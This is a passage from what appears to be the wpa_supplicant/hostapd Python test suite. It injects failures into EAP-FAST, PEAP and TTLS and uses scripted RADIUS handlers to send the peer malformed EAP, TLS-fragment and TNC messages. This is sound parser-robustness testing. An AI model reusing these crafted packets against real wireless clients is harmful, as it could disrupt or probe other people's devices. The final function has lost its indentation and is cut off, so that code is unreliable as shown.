        dev[0].request("SET blob fast_pac_errors ")
        with alloc_fail(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="FAST", anonymous_identity="FAST",
                           identity="user", password="password",
                           ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
                           phase1="fast_provisioning=1",
                           pac_file="blob://fast_pac_errors",
                           erp="1",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Forced failures (fail_test, not alloc_fail) in crypto-binding handling
    tests = [ (1, "eap_fast_get_cmk;eap_fast_process_crypto_binding"),
              (1, "eap_fast_derive_eap_msk;eap_fast_process_crypto_binding"),
              (1, "eap_fast_derive_eap_emsk;eap_fast_process_crypto_binding") ]
    for count, func in tests:
        dev[0].request("SET blob fast_pac_auth_errors ")
        with fail_test(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="FAST", anonymous_identity="FAST",
                           identity="user", password="password",
                           ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
                           phase1="fast_provisioning=2",
                           pac_file="blob://fast_pac_auth_errors",
                           erp="1",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            wait_fail_trigger(dev[0], "GET_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    dev[0].request("SET blob fast_pac_errors ")
    dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                   eap="FAST", anonymous_identity="FAST",
                   identity="user", password="password",
                   ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
                   phase1="fast_provisioning=1",
                   pac_file="blob://fast_pac_errors",
                   wait_connect=False)
    ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
    if ev is None:
        raise Exception("Timeout on EAP start")
    # EAP-FAST: Only EAP-MSCHAPv2 is allowed during unauthenticated
    # provisioning; reject phase2 type 6
    ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
    if ev is None:
        raise Exception("Timeout on EAP failure")
    dev[0].request("REMOVE_NETWORK all")
    dev[0].wait_disconnected()
    logger.info("Wrong password in Phase 2")
    dev[0].request("SET blob fast_pac_errors ")
    dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                   eap="FAST", anonymous_identity="FAST",
                   identity="user", password="wrong password",
                   ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
                   phase1="fast_provisioning=1",
                   pac_file="blob://fast_pac_errors",
                   wait_connect=False)
    ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
    if ev is None:
        raise Exception("Timeout on EAP start")
    ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
    if ev is None:
        raise Exception("Timeout on EAP failure")
    dev[0].request("REMOVE_NETWORK all")
    dev[0].wait_disconnected()
    # Malformed PAC file contents: each entry is a separate PAC blob that
    # must make EAP-FAST initialization fail. Fix: the PAC-Type=12345 entry
    # previously lacked a trailing comma, so implicit string concatenation
    # silently merged it with the following entry and that test case was
    # never exercised on its own.
    tests = [ "FOOBAR\n",
              "wpa_supplicant EAP-FAST PAC file - version 1\nFOOBAR\n",
              "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\n",
              "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nSTART\n",
              "wpa_supplicant EAP-FAST PAC file - version 1\nEND\n",
              "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Type=12345\nEND\n",
              "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Key=12\nEND\n",
              "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Key=1\nEND\n",
              "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Key=1q\nEND\n",
              "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nPAC-Opaque=1\nEND\n",
              "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nA-ID=1\nEND\n",
              "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nI-ID=1\nEND\n",
              "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nA-ID-Info=1\nEND\n" ]
    for pac in tests:
        blob = binascii.hexlify(pac)
        dev[0].request("SET blob fast_pac_errors " + blob)
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="FAST", anonymous_identity="FAST",
                       identity="user", password="password",
                       ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
                       phase1="fast_provisioning=2",
                       pac_file="blob://fast_pac_errors",
                       wait_connect=False)
        ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                               timeout=5)
        if ev is None:
            raise Exception("Timeout on EAP start")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
    # Syntactically valid (but empty) PAC files must still allow connection
    tests = [ "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nEND\n",
              "wpa_supplicant EAP-FAST PAC file - version 1\nSTART\nEND\nSTART\nEND\nSTART\nEND\n" ]
    for pac in tests:
        blob = binascii.hexlify(pac)
        dev[0].request("SET blob fast_pac_errors " + blob)
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="FAST", anonymous_identity="FAST",
                       identity="user", password="password",
                       ca_cert="auth_serv/ca.pem", phase2="auth=GTC",
                       phase1="fast_provisioning=2",
                       pac_file="blob://fast_pac_errors")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
    dev[0].request("SET blob fast_pac_errors ")
def test_eap_proto_peap_errors(dev, apdev):
    """EAP-PEAP local error cases

    Injects allocation and forced failures at specific internal functions
    of the peer-side EAP-PEAP implementation and verifies that each failing
    attempt is handled cleanly (network removed, station disconnected).
    """
    check_eap_capa(dev[0], "PEAP")
    check_eap_capa(dev[0], "MSCHAPV2")
    hapd = hostapd.add_ap(apdev[0]['ifname'],
                          hostapd.wpa2_eap_params(ssid="eap-test"))
    # Allocation failures while initializing the EAP-PEAP method itself
    for attempt in range(1, 5):
        with alloc_fail(dev[0], attempt, "eap_peap_init"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="PEAP", anonymous_identity="peap",
                           identity="user", password="password",
                           ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
                           wait_connect=False)
            ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                                   timeout=5)
            if ev is None:
                raise Exception("Timeout on EAP start")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # (count, failing function) pairs triggered via alloc_fail
    alloc_cases = [
        (1, "eap_mschapv2_getKey;eap_peap_get_isk;eap_peap_derive_cmk"),
        (1, "eap_msg_alloc;eap_tlv_build_result"),
        (1, "eap_mschapv2_init;eap_peap_phase2_request"),
        (1, "eap_peer_tls_decrypt;eap_peap_decrypt"),
        (1, "wpabuf_alloc;=eap_peap_decrypt"),
        (1, "eap_peer_tls_encrypt;eap_peap_decrypt"),
        (1, "eap_peer_tls_process_helper;eap_peap_process"),
        (1, "eap_peer_tls_derive_key;eap_peap_process"),
        (1, "eap_peer_tls_derive_session_id;eap_peap_process"),
        (1, "eap_peap_getKey"),
        (1, "eap_peap_get_session_id"),
    ]
    # (count, failing function) pairs triggered via fail_test
    fail_cases = [
        (1, "peap_prfplus;eap_peap_derive_cmk"),
        (1, "eap_tlv_add_cryptobinding;eap_tlv_build_result"),
        (1, "peap_prfplus;eap_peap_getKey"),
    ]
    # Both case groups share the same connection parameters; only the
    # injection context manager and the trigger name differ.
    for use_fail, cases in ((False, alloc_cases), (True, fail_cases)):
        injector = fail_test if use_fail else alloc_fail
        trigger = "GET_FAIL" if use_fail else "GET_ALLOC_FAIL"
        for count, func in cases:
            with injector(dev[0], count, func):
                dev[0].connect("eap-test", key_mgmt="WPA-EAP",
                               scan_freq="2412",
                               eap="PEAP", anonymous_identity="peap",
                               identity="user", password="password",
                               phase1="peapver=0 crypto_binding=2",
                               ca_cert="auth_serv/ca.pem",
                               phase2="auth=MSCHAPV2",
                               erp="1", wait_connect=False)
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                       timeout=15)
                if ev is None:
                    raise Exception("Timeout on EAP start")
                wait_fail_trigger(dev[0], trigger)
                dev[0].request("REMOVE_NETWORK all")
                dev[0].wait_disconnected()
    # Allocation failure while NAKing the Phase 2 method ("cert user"
    # triggers an inner method the peer rejects)
    with alloc_fail(dev[0], 1,
                    "eap_peer_tls_phase2_nak;eap_peap_phase2_request"):
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="PEAP", anonymous_identity="peap",
                       identity="cert user", password="password",
                       ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
                       wait_connect=False)
        wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
def test_eap_proto_ttls_errors(dev, apdev):
    """EAP-TTLS local error cases

    Injects allocation and forced failures at specific internal functions
    of the peer-side EAP-TTLS implementation across the different Phase 2
    methods (MSCHAPV2, MSCHAP, CHAP, PAP, tunneled EAP).

    Fix: the identity strings previously used "DOMAIN\\mschapv2 user" with a
    single backslash written as the invalid escape sequence "\\m"
    (DeprecationWarning since Python 3.6, slated to become a SyntaxError).
    The backslash is now escaped explicitly; the resulting string value is
    byte-identical.
    """
    check_eap_capa(dev[0], "TTLS")
    check_eap_capa(dev[0], "MSCHAPV2")
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)
    # Allocation failures while initializing the EAP-TTLS method
    for i in range(1, 5):
        with alloc_fail(dev[0], i, "eap_ttls_init"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="TTLS", anonymous_identity="ttls",
                           identity="user", password="password",
                           ca_cert="auth_serv/ca.pem",
                           phase2="autheap=MSCHAPV2",
                           wait_connect=False)
            ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                                   timeout=5)
            if ev is None:
                raise Exception("Timeout on EAP start")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # (count, failing function, identity, phase2) tuples; identity selects
    # the user entry (and thus Phase 2 method) on the authentication server
    tests = [ (1, "eap_peer_tls_derive_key;eap_ttls_v0_derive_key",
               "DOMAIN\\mschapv2 user", "auth=MSCHAPV2"),
              (1, "eap_peer_tls_derive_session_id;eap_ttls_v0_derive_key",
               "DOMAIN\\mschapv2 user", "auth=MSCHAPV2"),
              (1, "wpabuf_alloc;eap_ttls_phase2_request_mschapv2",
               "DOMAIN\\mschapv2 user", "auth=MSCHAPV2"),
              (1, "eap_peer_tls_derive_key;eap_ttls_phase2_request_mschapv2",
               "DOMAIN\\mschapv2 user", "auth=MSCHAPV2"),
              (1, "eap_peer_tls_encrypt;eap_ttls_encrypt_response;eap_ttls_implicit_identity_request",
               "DOMAIN\\mschapv2 user", "auth=MSCHAPV2"),
              (1, "eap_peer_tls_decrypt;eap_ttls_decrypt",
               "DOMAIN\\mschapv2 user", "auth=MSCHAPV2"),
              (1, "eap_ttls_getKey",
               "DOMAIN\\mschapv2 user", "auth=MSCHAPV2"),
              (1, "eap_ttls_get_session_id",
               "DOMAIN\\mschapv2 user", "auth=MSCHAPV2"),
              (1, "eap_ttls_get_emsk",
               "DOMAIN\\mschapv2 user", "auth=MSCHAPV2"),
              (1, "wpabuf_alloc;eap_ttls_phase2_request_mschap",
               "mschap user", "auth=MSCHAP"),
              (1, "eap_peer_tls_derive_key;eap_ttls_phase2_request_mschap",
               "mschap user", "auth=MSCHAP"),
              (1, "wpabuf_alloc;eap_ttls_phase2_request_chap",
               "chap user", "auth=CHAP"),
              (1, "eap_peer_tls_derive_key;eap_ttls_phase2_request_chap",
               "chap user", "auth=CHAP"),
              (1, "wpabuf_alloc;eap_ttls_phase2_request_pap",
               "pap user", "auth=PAP"),
              (1, "wpabuf_alloc;eap_ttls_avp_encapsulate",
               "user", "autheap=MSCHAPV2"),
              (1, "eap_mschapv2_init;eap_ttls_phase2_request_eap_method",
               "user", "autheap=MSCHAPV2"),
              (1, "eap_sm_buildIdentity;eap_ttls_phase2_request_eap",
               "user", "autheap=MSCHAPV2"),
              (1, "eap_ttls_avp_encapsulate;eap_ttls_phase2_request_eap",
               "user", "autheap=MSCHAPV2"),
              (1, "eap_ttls_parse_attr_eap",
               "user", "autheap=MSCHAPV2"),
              (1, "eap_peer_tls_encrypt;eap_ttls_encrypt_response;eap_ttls_process_decrypted",
               "user", "autheap=MSCHAPV2"),
              (1, "eap_ttls_fake_identity_request",
               "user", "autheap=MSCHAPV2"),
              (1, "eap_msg_alloc;eap_tls_process_output",
               "user", "autheap=MSCHAPV2"),
              (1, "eap_msg_alloc;eap_peer_tls_build_ack",
               "user", "autheap=MSCHAPV2"),
              (1, "tls_connection_decrypt;eap_peer_tls_decrypt",
               "user", "autheap=MSCHAPV2"),
              (1, "eap_peer_tls_phase2_nak;eap_ttls_phase2_request_eap_method",
               "cert user", "autheap=MSCHAPV2") ]
    for count, func, identity, phase2 in tests:
        with alloc_fail(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="TTLS", anonymous_identity="ttls",
                           identity=identity, password="password",
                           ca_cert="auth_serv/ca.pem", phase2=phase2,
                           erp="1", wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL",
                              note="Allocation failure not triggered for: %d:%s" % (count, func))
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    # Forced failures (fail_test) in the MSCHAPv2 Phase 2 request path
    tests = [ (1, "os_get_random;eap_ttls_phase2_request_mschapv2"),
              (1, "mschapv2_derive_response;eap_ttls_phase2_request_mschapv2") ]
    for count, func in tests:
        with fail_test(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="TTLS", anonymous_identity="ttls",
                           identity="DOMAIN\\mschapv2 user", password="password",
                           ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
                           erp="1", wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            wait_fail_trigger(dev[0], "GET_FAIL",
                              note="Test failure not triggered for: %d:%s" % (count, func))
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
def test_eap_proto_expanded(dev, apdev):
    """EAP protocol tests with expanded header

    Feeds the peer EAP requests that use the expanded (type 254) header
    with malformed lengths, wrong vendor/frame types, and an MSCHAPv2
    challenge, via a scripted local RADIUS server.
    """
    global eap_proto_expanded_test_done
    eap_proto_expanded_test_done = False
    def expanded_handler(ctx, req):
        # Scripted RADIUS-side EAP handler: each invocation returns the next
        # test message. ctx persists across calls ('num' counts invocations);
        # req is the raw EAP message from the peer (Python 2 str).
        logger.info("expanded_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] += 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        # idx is bumped before each case so invocation N picks test case N.
        idx = 0
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: MD5 challenge in expanded header")
            # Expanded header: Type 254, 3-octet vendor id 0, 4-octet
            # vendor type, then an MD5 challenge body
            return struct.pack(">BBHB3BLBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4 + 3,
                               EAP_TYPE_EXPANDED, 0, 0, 0, EAP_TYPE_MD5,
                               1, 0xaa, ord('n'))
        idx += 1
        if ctx['num'] == idx:
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid expanded EAP length")
            # Message ends before the full 4-octet vendor type field
            return struct.pack(">BBHB3BH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 2,
                               EAP_TYPE_EXPANDED, 0, 0, 0, EAP_TYPE_MD5)
        idx += 1
        if ctx['num'] == idx:
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid expanded frame type")
            # Vendor id 1 does not match the expected vendor 0 framing
            return struct.pack(">BBHB3BL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_EXPANDED, 0, 0, 1, EAP_TYPE_MD5)
        idx += 1
        if ctx['num'] == idx:
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: MSCHAPv2 Challenge")
            # Plain (non-expanded) MSCHAPv2 challenge with 16-octet
            # challenge and "foobar" server name
            return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 4 + 1 + 16 + 6,
                               EAP_TYPE_MSCHAPV2,
                               1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid expanded frame type")
            return struct.pack(">BBHB3BL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_EXPANDED, 0, 0, 1, EAP_TYPE_MSCHAPV2)
        # Scripted sequence exhausted: flag completion for the driver loop.
        logger.info("No more test responses available - test case completed")
        global eap_proto_expanded_test_done
        eap_proto_expanded_test_done = True
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
    srv = start_radius_server(expanded_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        i = 0
        while not eap_proto_expanded_test_done:
            i += 1
            logger.info("Running connection iteration %d" % i)
            # Iteration 4 hits the MSCHAPv2 Challenge test case, so use the
            # matching peer method; all other iterations use MD5.
            if i == 4:
                dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                               eap="MSCHAPV2", identity="user",
                               password="password",
                               wait_connect=False)
            else:
                dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                               eap="MD5", identity="user", password="password",
                               wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
            if ev is None:
                raise Exception("Timeout on EAP start")
            # Expected per-iteration outcome: method start + failure for the
            # first case, proposed method + failure for the invalid-length
            # and invalid-frame-type cases, otherwise just give the exchange
            # a moment to complete.
            if i in [ 1 ]:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
                if ev is None:
                    raise Exception("Timeout on EAP method start")
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            elif i in [ 2, 3 ]:
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                       timeout=5)
                if ev is None:
                    raise Exception("Timeout on EAP proposed method")
                ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
                if ev is None:
                    raise Exception("Timeout on EAP failure")
            else:
                time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected(timeout=1)
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_proto_tls(dev, apdev):
    """EAP-TLS protocol tests

    Exercises the peer's EAP-TLS fragmentation/reassembly logic with
    malformed Flags/Message Length combinations served by a scripted local
    RADIUS server.
    """
    check_eap_capa(dev[0], "TLS")
    global eap_proto_tls_test_done, eap_proto_tls_test_wait
    eap_proto_tls_test_done = False
    eap_proto_tls_test_wait = False
    def tls_handler(ctx, req):
        # Scripted RADIUS-side EAP handler: each invocation returns the next
        # test message. Flags octet semantics in the messages below:
        # 0x80 = Length included, 0x40 = More fragments, 0x20 = Start.
        logger.info("tls_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] += 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        # idx is bumped before each case so invocation N picks test case N.
        idx = 0
        global eap_proto_tls_test_wait
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too much payload in TLS/Start: TLS Message Length (0 bytes) smaller than this fragment (1 bytes)")
            return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4 + 1,
                               EAP_TYPE_TLS, 0xa0, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Fragmented TLS/Start")
            return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4 + 1,
                               EAP_TYPE_TLS, 0xe0, 2, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too long fragment of TLS/Start: Invalid reassembly state: tls_in_left=2 tls_in_len=0 in_len=0")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2,
                               EAP_TYPE_TLS, 0x00, 2, 3)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: TLS/Start")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_TLS, 0x20)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Fragmented TLS message")
            return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4 + 1,
                               EAP_TYPE_TLS, 0xc0, 2, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid TLS message: no Flags octet included + workaround")
            # EAP-TLS workaround enabled on this iteration (see driver loop)
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_TLS)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too long fragment of TLS message: more data than TLS message length indicated")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2,
                               EAP_TYPE_TLS, 0x00, 2, 3)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Fragmented TLS/Start and truncated Message Length field")
            # Length-included flag set, but only 3 of 4 Message Length octets
            return struct.pack(">BBHBB3B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 3,
                               EAP_TYPE_TLS, 0xe0, 1, 2, 3)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: TLS/Start")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_TLS, 0x20)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Fragmented TLS message")
            return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4 + 1,
                               EAP_TYPE_TLS, 0xc0, 2, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Invalid TLS message: no Flags octet included + workaround disabled")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_TLS)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: TLS/Start")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_TLS, 0x20)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Fragmented TLS message (long; first)")
            payload = 1450*'A'
            return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 4 + len(payload),
                               EAP_TYPE_TLS, 0xc0, 65536) + payload
        # "Too long TLS fragment (size over 64 kB)" on the last one
        for i in range(44):
            idx += 1
            if ctx['num'] == idx:
                logger.info("Test: Fragmented TLS message (long; cont %d)" % i)
                # Tell the driver loop to keep waiting while the long
                # multi-fragment exchange is in progress
                eap_proto_tls_test_wait = True
                payload = 1470*'A'
                return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                                   4 + 1 + 1 + len(payload),
                                   EAP_TYPE_TLS, 0x40) + payload
        eap_proto_tls_test_wait = False
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: TLS/Start")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_TLS, 0x20)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Non-ACK to more-fragment message")
            return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 1,
                               EAP_TYPE_TLS, 0x00, 255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Failure")
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        # Scripted sequence exhausted: flag completion for the driver loop.
        logger.info("No more test responses available - test case completed")
        global eap_proto_tls_test_done
        eap_proto_tls_test_done = True
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
    srv = start_radius_server(tls_handler)
    try:
        hapd = start_ap(apdev[0]['ifname'])
        i = 0
        while not eap_proto_tls_test_done:
            i += 1
            logger.info("Running connection iteration %d" % i)
            # Iteration 6 tests the missing-Flags case with the EAP
            # workaround disabled; iteration 8 uses a small fragment size to
            # force peer-side fragmentation.
            workaround = "0" if i == 6 else "1"
            fragment_size = "100" if i == 8 else "1400"
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="TLS", identity="tls user",
                           ca_cert="auth_serv/ca.pem",
                           client_cert="auth_serv/user.pem",
                           private_key="auth_serv/user.key",
                           eap_workaround=workaround,
                           fragment_size=fragment_size,
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
            if ev is None:
                raise Exception("Timeout on EAP start")
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD",
                                    "CTRL-EVENT-EAP-STATUS"], timeout=5)
            if ev is None:
                raise Exception("Timeout on EAP method start")
            time.sleep(0.1)
            # Wait (up to 10 s of wall-clock time) for the long fragmented
            # exchange to finish before tearing the connection down
            start = os.times()[4]
            while eap_proto_tls_test_wait:
                now = os.times()[4]
                if now - start > 10:
                    break
                time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected(timeout=1)
            dev[0].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_proto_tnc(dev, apdev):
"""EAP-TNC protocol tests"""
check_eap_capa(dev[0], "TNC")
global eap_proto_tnc_test_done
eap_proto_tnc_test_done = False
def tnc_handler(ctx, req):
logger.info("tnc_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC start with unsupported version")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x20)
idx += 1
if ctx['num'] == idx:
logger.info("Test: TNC without Flags field")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_TNC)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Message underflow due to missing Message Length")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0xa1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_TNC, 0xa1, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid Message Length")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_TNC, 0xe1, 75001)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Start with Message Length")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_TNC, 0xa1, 1)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Server used start flag again")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_TNC, 0x21)
idx += 1
if ctx['num'] == idx:
